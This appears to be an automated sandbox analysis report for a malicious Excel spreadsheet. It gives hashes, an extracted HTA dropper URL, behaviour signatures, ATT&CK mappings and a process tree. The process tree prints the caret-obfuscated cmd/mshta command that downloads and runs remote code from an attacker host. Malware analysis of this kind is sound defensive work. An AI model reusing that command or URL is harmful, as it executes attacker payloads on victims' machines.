Analysis

  • max time kernel
    130s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19-01-2022 12:55

General

  • Target

    c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls

  • Size

    142KB

  • MD5

    8d6b43ca03cf1e4d675a523c4b06e214

  • SHA1

    6cdde32cd5ce069e00c952575714e66c55f091cc

  • SHA256

    c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94

  • SHA512

    600dc0d8cd18517e49c8319c8a7e9feb8cdd6354d80ff1c0b7e99ccdbd9fc3651b30c07448792fd7b52ec877068d72a2c664c2e79ca8fcdfd542ff6f1c8f7418

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3716
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2156
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Windows\system32\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          PID:1868

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3716-115-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp
      Filesize

      64KB

    • memory/3716-116-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp
      Filesize

      64KB

    • memory/3716-117-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp
      Filesize

      64KB

    • memory/3716-118-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp
      Filesize

      64KB

    • memory/3716-119-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp
      Filesize

      64KB

    • memory/3716-128-0x00007FFF786A0000-0x00007FFF786B0000-memory.dmp
      Filesize

      64KB

    • memory/3716-129-0x00007FFF786A0000-0x00007FFF786B0000-memory.dmp
      Filesize

      64KB

    • memory/3716-513-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp
      Filesize

      64KB

    • memory/3716-514-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp
      Filesize

      64KB

    • memory/3716-515-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp
      Filesize

      64KB

    • memory/3716-516-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp
      Filesize

      64KB